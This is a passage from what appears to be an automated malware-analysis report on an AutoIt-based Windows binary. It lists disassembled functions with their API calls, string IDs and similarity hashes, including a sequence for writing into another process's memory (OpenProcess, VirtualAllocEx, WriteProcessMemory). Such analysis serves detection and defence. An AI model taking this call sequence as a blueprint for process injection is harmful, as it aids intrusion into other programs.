          • Instruction Fuzzy Hash: 7D215371903215ABD72EDF69E888A9A7BBDE705220F104166F934D32C4D37094C4CB95
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • Sleep.KERNEL32(00000000), ref: 0116457F
          • QueryPerformanceCounter.KERNEL32(?), ref: 0116459C
          • Sleep.KERNEL32(00000000), ref: 011645BB
          • QueryPerformanceCounter.KERNEL32(?), ref: 011645C5
          Similarity
          • API ID: CounterPerformanceQuerySleep
          • String ID:
          • API String ID: 2875609808-0
          • Opcode ID: 70f2ac12b2c68f6847a50a2873d9e69cc932f1f980335d4d21c386cbf832d6bd
          • Instruction ID: 70269abeafb4d1a3a308c986485339e0187b74fc6ce1b9f856a6bb10fe497013
          • Opcode Fuzzy Hash: 70f2ac12b2c68f6847a50a2873d9e69cc932f1f980335d4d21c386cbf832d6bd
          • Instruction Fuzzy Hash: A911B232D0011DDBCF18DFD8E944AEEBB78FF89711F004266EA0072640CB31A5658BE1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SendMessageW.USER32(?,00001101,00000000,?), ref: 01185571
          • DeleteObject.GDI32(?), ref: 011856AB
          • DeleteObject.GDI32(?), ref: 011856B9
          • DestroyIcon.USER32(?), ref: 011856C7
          • DestroyWindow.USER32(?), ref: 011856D5
          Similarity
          • API ID: DeleteDestroyObject$IconMessageSendWindow
          • String ID:
          • API String ID: 1489400265-0
          • Opcode ID: 16579c0c673f8b29d0e3acc075b63b314629cfbe8c2c809a89949887252908d1
          • Instruction ID: b84a2062331d7a6e75cf582533cdcd9ceb1a513b01fc8d62c6a9b3a5a9159447
          • Opcode Fuzzy Hash: 16579c0c673f8b29d0e3acc075b63b314629cfbe8c2c809a89949887252908d1
          • Instruction Fuzzy Hash: B6016D71314301ABDB68EF29E9C8A26777AFF48711B248564FE11CB289C734E885CF65
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 0115FF70: InvalidateRect.USER32(?,00000000,00000001), ref: 0115FFFE
          • DestroyWindow.USER32(?), ref: 0118569D
          • DeleteObject.GDI32(?), ref: 011856AB
          • DeleteObject.GDI32(?), ref: 011856B9
          • DestroyIcon.USER32(?), ref: 011856C7
          • DestroyWindow.USER32(?), ref: 011856D5
          Similarity
          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
          • String ID:
          • API String ID: 1042038666-0
          • Opcode ID: 6a534e07c29c03cfe8eed8451d1fb599b3fc974ea026dc2001e1f1785955fe96
          • Instruction ID: d7cde0227135aca37749c75d12bcbea06d39bf87e2a4cb65b6b9889e6f232f4b
          • Opcode Fuzzy Hash: 6a534e07c29c03cfe8eed8451d1fb599b3fc974ea026dc2001e1f1785955fe96
          • Instruction Fuzzy Hash: 5C016D75201301ABDB28EF69E8C891A77BDFF082547108564FD11C7248C734E8858F75
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01141810: _doexit.LIBCMT ref: 0114181C
          • ___set_flsgetvalue.LIBCMT ref: 011450E0
            • Part of subcall function 011477D1: TlsGetValue.KERNEL32(?,0114792A,?,011412DC,?,00000001), ref: 011477DA
            • Part of subcall function 011477D1: TlsSetValue.KERNEL32(00000000,?,011412DC,?,00000001), ref: 011477FB
          • ___fls_getvalue@4.LIBCMT ref: 011450EB
            • Part of subcall function 011477B1: TlsGetValue.KERNEL32(?,?,01143C50,00000000), ref: 011477BF
          • ___fls_setvalue@8.LIBCMT ref: 011450FD
          • GetLastError.KERNEL32(00000000,?,00000000), ref: 01145106
          • ExitThread.KERNEL32 ref: 0114510D
          • __freefls@4.LIBCMT ref: 01145129
          Similarity
          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
          • String ID:
          • API String ID: 4247068974-0
          • Opcode ID: 141ffd8e67fa144fff31df8efacfdcbce58d61d5c5ad2ac9cb2205122b199a4c
          • Instruction ID: 7f27c7d21a34daadc80f49b8c650bf4bf6fb7db7a029bcb7d39ce1c3f2cf1ebf
          • Opcode Fuzzy Hash: 141ffd8e67fa144fff31df8efacfdcbce58d61d5c5ad2ac9cb2205122b199a4c
          • Instruction Fuzzy Hash: 6CE0C2758007076BEF1D77F08C4CD5F3A2D5F18D8DB500820FA10A20A5EF34D4918661
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Similarity
          • API ID:
          • String ID: )$U$\
          • API String ID: 0-3705770531
          • Opcode ID: 0869da7278554940868443dca89fd85589374785fa1a42fa98824dcca0af5353
          • Instruction ID: 74b3f5248ff51b43c6e1acbdf0c05c970862cded902e032aac2b86b54e41694a
          • Opcode Fuzzy Hash: 0869da7278554940868443dca89fd85589374785fa1a42fa98824dcca0af5353
          • Instruction Fuzzy Hash: ECC1E270A0424ACFDB29CF69C5806AEBFF1FF89304F2481AAD8629B345D7319946CF51
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: _memmove
          • String ID: \
          • API String ID: 4104443479-2967466578
          • Opcode ID: 735310c8083acc1edd9605807394d1b5283c9e22d9ec3861ba384c3b146306ab
          • Instruction ID: 5026c0b98c402d02800771239209ca5d24d80fda431b2a29f471a32961a08cfd
          • Opcode Fuzzy Hash: 735310c8083acc1edd9605807394d1b5283c9e22d9ec3861ba384c3b146306ab
          • Instruction Fuzzy Hash: A1B17A70906249CFDF1ECFA8C8947ADBBF2BF45304F288199D451AB392D7355942CB92
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: _memmove
          • String ID: \
          • API String ID: 4104443479-2967466578
          • Opcode ID: 8bdae5521a45f7fbf15e75d2a59c4071e73274baeec8cb91095a2c934a0185ec
          • Instruction ID: 7a54c74875471d7c853b0cdb36345eb46f395a93c817c6c0bed8f1dae773ccda
          • Opcode Fuzzy Hash: 8bdae5521a45f7fbf15e75d2a59c4071e73274baeec8cb91095a2c934a0185ec
          • Instruction Fuzzy Hash: 69B18A70906249CFDF1ECFA8C8947ADBBF2BF45304F288199D451AB382D7355942CB92
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: _memmove
          • String ID: \
          • API String ID: 4104443479-2967466578
          • Opcode ID: 601bdaa49e549cd8f51a7ff18a339c129e8dc0388f79bc320a0ee1ca79510194
          • Instruction ID: c495418011c67ff91766fa8d29584c4f01ac84f1136f7de3940f2e28f97ab171
          • Opcode Fuzzy Hash: 601bdaa49e549cd8f51a7ff18a339c129e8dc0388f79bc320a0ee1ca79510194
          • Instruction Fuzzy Hash: 01A17970906249CFDF1ECFA8C8947ADBBF2AF49304F288199D451AB382D7755942CB92
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01172654: _wcslen.LIBCMT ref: 01172680
          • CoInitialize.OLE32(00000000), ref: 011A83FC
          • CoCreateInstance.OLE32(011B2A08,00000000,00000001,011B28A8,?), ref: 011A8415
          • CoUninitialize.OLE32 ref: 011A85F6
          Strings
          Similarity
          • API ID: CreateInitializeInstanceUninitialize_wcslen
          • String ID: .lnk
          • API String ID: 886957087-24824748
          • Opcode ID: 1f27437e5bc13d20d81a1ea55d8db925c32aa1f49074c93d92aa344338443d38
          • Instruction ID: 91d2886dc66d0188cfa005bc47a0b8af43a74e41a900cecc5ec6044bf1955b0e
          • Opcode Fuzzy Hash: 1f27437e5bc13d20d81a1ea55d8db925c32aa1f49074c93d92aa344338443d38
          • Instruction Fuzzy Hash: 9B812970244301AFD214EB94DC81F5AB3E5AFC8718F148918FA58DB2E5D7B1ED45CB92
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01164300: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 01164331
          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 01166579
            • Part of subcall function 011642C4: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 011642F5
            • Part of subcall function 01164394: GetWindowThreadProcessId.USER32(?,?), ref: 011643C7
            • Part of subcall function 01164394: OpenProcess.KERNEL32(00000438,00000000,?), ref: 011643D8
            • Part of subcall function 01164394: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 011643EF
          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 011665E9
          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 01166669
          Strings
          Similarity
          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
          • String ID: @
          • API String ID: 4150878124-2766056989
          • Opcode ID: f245964b63f48de99f1e9eabf442e033f1e794f514a1c5e5295a5d96aef2e0e8
          • Instruction ID: 68ab586762b27962e3c78f12428031a757fd17eeff98e7daf6d79f5545efc6d2
          • Opcode Fuzzy Hash: f245964b63f48de99f1e9eabf442e033f1e794f514a1c5e5295a5d96aef2e0e8
          • Instruction Fuzzy Hash: 74517676A002196BCB14DFA8DD81FDEB77CEF99300F004599F705AB180D771AA55CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: _memmove
          • String ID: \$]$h
          • API String ID: 4104443479-3262404753
          • Opcode ID: 118f89877cc77c7e81921184722620b5f80af337c6e47cca6c710dc6bf37c7ee
          • Instruction ID: 3dc2c9b4730480c92d5021eaa8c6670fba60c9fe9ceefea3dd9c66cee8aa0576
          • Opcode Fuzzy Hash: 118f89877cc77c7e81921184722620b5f80af337c6e47cca6c710dc6bf37c7ee
          • Instruction Fuzzy Hash: 9B516270E0020A9FDF1CCF69C990AAEBBF6BF89304F29C169E515A7354D7305A41CB51
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • CLSIDFromString.OLE32(?,00000000), ref: 01165244
          • SafeArrayAccessData.OLEAUT32(?,?), ref: 01165293
          • SafeArrayUnaccessData.OLEAUT32(?), ref: 011652C2
          Strings
          Similarity
          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
          • String ID: crts
          • API String ID: 943502515-3724388283
          • Opcode ID: 7bb813dbcf86f0250f4d34b3819432c37ec12d5e11399ebf283e943e72a35b6c
          • Instruction ID: 4a9adcfedbc054e1509ef60498e10c182271aa425e1b1a66b39a8d93ad3553a3
          • Opcode Fuzzy Hash: 7bb813dbcf86f0250f4d34b3819432c37ec12d5e11399ebf283e943e72a35b6c
          • Instruction Fuzzy Hash: 2C212776600601DFC318CF8AE484C96FBE9EF98761704C42AEA59CB721D334E891CB90
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0116120B
          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 0116121D
          Strings
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: ICMP.DLL$IcmpSendEcho
          • API String ID: 2574300362-58917771
          • Opcode ID: 0647bb6c54277a6fac86f11025c837589e62c5c9f61c61aaa783682d7a4794ae
          • Instruction ID: 22e9a96ed13c3dce96b27491fc907a0e7254ccc91c8dced5505b6edba221a411
          • Opcode Fuzzy Hash: 0647bb6c54277a6fac86f11025c837589e62c5c9f61c61aaa783682d7a4794ae
          • Instruction Fuzzy Hash: A1E012B1909346AFD7385F97E4846867BECDB08651B20842DED55D2510D771E49087A4
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0116123D
          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0116124F
          Strings
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: ICMP.DLL$IcmpCloseHandle
          • API String ID: 2574300362-3530519716
          • Opcode ID: 6812dc84b8ff773435734ab9e7b9341acf17894536097686d2b62f567ecc21ef
          • Instruction ID: 6f6813d6b1db310e31602be5c5edcff881427b2a8d34089ea52a8013c0ca2cbf
          • Opcode Fuzzy Hash: 6812dc84b8ff773435734ab9e7b9341acf17894536097686d2b62f567ecc21ef
          • Instruction Fuzzy Hash: AEE0C2B0449306AFD7384F57D4886427BEC9F54212B20442DEA42D2510C7B0E08487A4
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0116126F
          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 01161281
          Strings
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: ICMP.DLL$IcmpCreateFile
          • API String ID: 2574300362-275556492
          • Opcode ID: 5b8180695d8304167227de6a15c0b09f74c8e8c0c9c42482e63d8efb333abdd5
          • Instruction ID: b052e86920798bf26b05000da721fb751e79cd5a27498868e969c95bd951f7c8
          • Opcode Fuzzy Hash: 5b8180695d8304167227de6a15c0b09f74c8e8c0c9c42482e63d8efb333abdd5
          • Instruction Fuzzy Hash: EDE0C2B0409306AFD7684F56D4446467BECAB18212B20442DFD42D2520CB71E0848BA4
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • SetErrorMode.KERNEL32 ref: 011A8188
          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 011A8341
            • Part of subcall function 0116397D: GetFileAttributesW.KERNELBASE(?), ref: 01163984
          • SetErrorMode.KERNEL32(?), ref: 011A822A
          • SetErrorMode.KERNEL32(?), ref: 011A82FA
          Similarity
          • API ID: ErrorMode$AttributesFile_memmove_wcslen
          • String ID:
          • API String ID: 3884216118-0
          • Opcode ID: ccea8b5b1cb2965cfd87691b39db145da7491a7cd01bc80fe0abc8078ee71ab3
          • Instruction ID: 4490f8406a6ed34a72ca3510991f3efb5cf85fee949bc1f618bf6119f1a76bc1
          • Opcode Fuzzy Hash: ccea8b5b1cb2965cfd87691b39db145da7491a7cd01bc80fe0abc8078ee71ab3
          • Instruction Fuzzy Hash: 4E616B716083419FC718EF68D880A5BBBE0BFD8718F44891DFA999B350C772E945CB92
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VariantInit.OLEAUT32(?), ref: 011A94C9
          • SysAllocString.OLEAUT32(00000000), ref: 011A9592
          • VariantCopy.OLEAUT32(?,?), ref: 011A95C9
          • VariantClear.OLEAUT32(?), ref: 011A960A
          Similarity
          • API ID: Variant$AllocClearCopyInitString
          • String ID:
          • API String ID: 2808897238-0
          • Opcode ID: 397f772e39667d8e77c8d91644c942e1baa110c533f6f1863146551ee882333c
          • Instruction ID: 64d5cf04f7812af0158ea735c6c42ea583548eb57e1faf31ad1b2c18fe52cc9c
          • Opcode Fuzzy Hash: 397f772e39667d8e77c8d91644c942e1baa110c533f6f1863146551ee882333c
          • Instruction Fuzzy Hash: 7C51F83920420E97CB18FF29D8405ADBB64EF94359F808526ED18DB244DB30DA55C7E2
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Similarity
          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
          • String ID:
          • API String ID: 2782032738-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • ClientToScreen.USER32(00000000,?), ref: 01171621
          • GetWindowRect.USER32 ref: 011716A9
          • PtInRect.USER32(?,?,?), ref: 011716BB
          • MessageBeep.USER32(00000000), ref: 01171734
          Similarity
          • API ID: Rect$BeepClientMessageScreenWindow
          • String ID:
          • API String ID: 1352109105-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0118D235
          • GetLastError.KERNEL32(?,00000000), ref: 0118D259
          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0118D279
          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0118D297
          Similarity
          • API ID: CreateHardLink$DeleteErrorFileLast
          • String ID:
          • API String ID: 3321077145-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetParent.USER32(?), ref: 0118033E
          • DefDlgProcW.USER32(?,00000138,?,?), ref: 0118038D
          • DefDlgProcW.USER32(?,00000133,?,?), ref: 011803DC
          • DefDlgProcW.USER32(?,00000134,?,?), ref: 0118040D
          Similarity
          • API ID: Proc$Parent
          • String ID:
          • API String ID: 2351499541-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01160593: _wcspbrk.LIBCMT ref: 011605A3
          • SendMessageW.USER32(?,00001002,00000000,?), ref: 011793D0
          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 01179460
          • _wcslen.LIBCMT ref: 01179472
          • _wcslen.LIBCMT ref: 0117947F
          Similarity
          • API ID: MessageSend_wcslen$_wcspbrk
          • String ID:
          • API String ID: 2886238975-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 0119F356: IsWindow.USER32(00000000), ref: 0119F386
          • GetWindowLongW.USER32(?,000000EC), ref: 011AA299
          • SetWindowLongW.USER32 ref: 011AA2B4
          • SetWindowLongW.USER32 ref: 011AA2CC
          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 011AA2DB
          Similarity
          • API ID: Window$Long$AttributesLayered
          • String ID:
          • API String ID: 2169480361-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 0118875F: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D204E858,00000000,00000000,00000000,00000000,?,?,?,01196CC2,?,011A3B72,011A3B72,?), ref: 0118877B
          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0119C5A6
          • WSAGetLastError.WSOCK32(00000000), ref: 0119C5B2
          • _memmove.LIBCMT ref: 0119C5EE
          • inet_ntoa.WSOCK32(?), ref: 0119C5FA
          Similarity
          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
          • String ID:
          • API String ID: 2502553879-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • CreateWindowExW.USER32 ref: 011601AF
          • GetStockObject.GDI32(00000011), ref: 011601C5
          • SendMessageW.USER32(00000000,00000030,00000000), ref: 011601CF
          • ShowWindow.USER32(00000000,00000000), ref: 011601EA
          Similarity
          • API ID: Window$CreateMessageObjectSendShowStock
          • String ID:
          • API String ID: 1358664141-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • EnterCriticalSection.KERNEL32(?), ref: 0117B581
          • InterlockedExchange.KERNEL32(?,?), ref: 0117B58F
          • LeaveCriticalSection.KERNEL32(?), ref: 0117B5A6
          • LeaveCriticalSection.KERNEL32(?), ref: 0117B5B8
          Similarity
          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
          • String ID:
          • API String ID: 2223660684-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011770BF: DeleteObject.GDI32(00000000), ref: 011770FC
            • Part of subcall function 011770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0117713C
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117714C
            • Part of subcall function 011770BF: BeginPath.GDI32(?), ref: 01177161
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117718A
          • MoveToEx.GDI32(?,?,?,00000000), ref: 0117723B
          • LineTo.GDI32(?,?,?), ref: 0117724A
          • EndPath.GDI32(?), ref: 0117725A
          • StrokePath.GDI32(?), ref: 01177268
          Similarity
          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
          • String ID:
          • API String ID: 2783949968-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SendMessageTimeoutW.USER32 ref: 01166425
          • GetWindowThreadProcessId.USER32(?,00000000), ref: 01166438
          • GetCurrentThreadId.KERNEL32 ref: 0116643F
          • AttachThreadInput.USER32(00000000), ref: 01166446
          Similarity
          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
          • String ID:
          • API String ID: 2710830443-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • __getptd_noexit.LIBCMT ref: 01145070
            • Part of subcall function 01147913: GetLastError.KERNEL32(00000003,?,01147994,?,01141259,?,?,011412DC,?,00000001), ref: 01147917
            • Part of subcall function 01147913: ___set_flsgetvalue.LIBCMT ref: 01147925
            • Part of subcall function 01147913: __calloc_crt.LIBCMT ref: 01147939
            • Part of subcall function 01147913: GetCurrentThreadId.KERNEL32 ref: 01147969
            • Part of subcall function 01147913: SetLastError.KERNEL32(00000000,?,011412DC,?,00000001), ref: 01147981
          • CloseHandle.KERNEL32(?,?,011450BB), ref: 01145084
          • __freeptd.LIBCMT ref: 0114508B
          • ExitThread.KERNEL32 ref: 01145093
          Similarity
          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
          • String ID:
          • API String ID: 1454798553-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: _strncmp
          • String ID: Q\E
          • API String ID: 909875538-2189900498
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: _memmove_strncmp
          • String ID: U$\
          • API String ID: 2666721431-100911408
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 0113F260: _wcslen.LIBCMT ref: 0113F262
            • Part of subcall function 0113F260: _wcscpy.LIBCMT ref: 0113F282
          • __wcsnicmp.LIBCMT ref: 011963D5
          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0119647B
          Strings
          Similarity
          • API ID: Connection__wcsnicmp_wcscpy_wcslen
          • String ID: LPT
          • API String ID: 3035604524-1350329615
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: _memmove
          • String ID: \
          • API String ID: 4104443479-2967466578
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0117839F
          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 011783B8
          Strings
          Similarity
          • API ID: MessageSend
          • String ID: '
          • API String ID: 3850602802-1997036262
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • _strlen.LIBCMT ref: 0113F548
            • Part of subcall function 0113F570: _memmove.LIBCMT ref: 0113F5B9
            • Part of subcall function 0113F570: _memmove.LIBCMT ref: 0113F5D3
          • _sprintf.LIBCMT ref: 0113F69E
          Strings
          Similarity
          • API ID: _memmove$_sprintf_strlen
          • String ID: %02X
          • API String ID: 1921645428-436463671
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetWindowTextLengthW.USER32(00000000), ref: 011812C0
          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 011812D0
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: LengthMessageSendTextWindow
          • String ID: edit
          • API String ID: 2978978980-2167791130
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _memmove
          • String ID: ?T
          • API String ID: 4104443479-3504941901
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 011990EB
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: MessageSend_memmove_wcslen
          • String ID: ComboBox$ListBox
          • API String ID: 547829025-1403004172
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: __fread_nolock_memmove
          • String ID: EA06
          • API String ID: 1988441806-3962188686
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SendMessageW.USER32(?,00001001,00000000,?), ref: 01186075
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • wsprintfW.USER32 ref: 011860A1
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: MessageSend_mallocwsprintf
          • String ID: %d/%02d/%02d
          • API String ID: 1262938277-328681919
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 01167058
            • Part of subcall function 011417FA: _doexit.LIBCMT ref: 01141806
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: Message_doexit
          • String ID: AutoIt$Error allocating memory.
          • API String ID: 1993061046-4017498283
          Uniqueness

          Uniqueness Score: -1.00%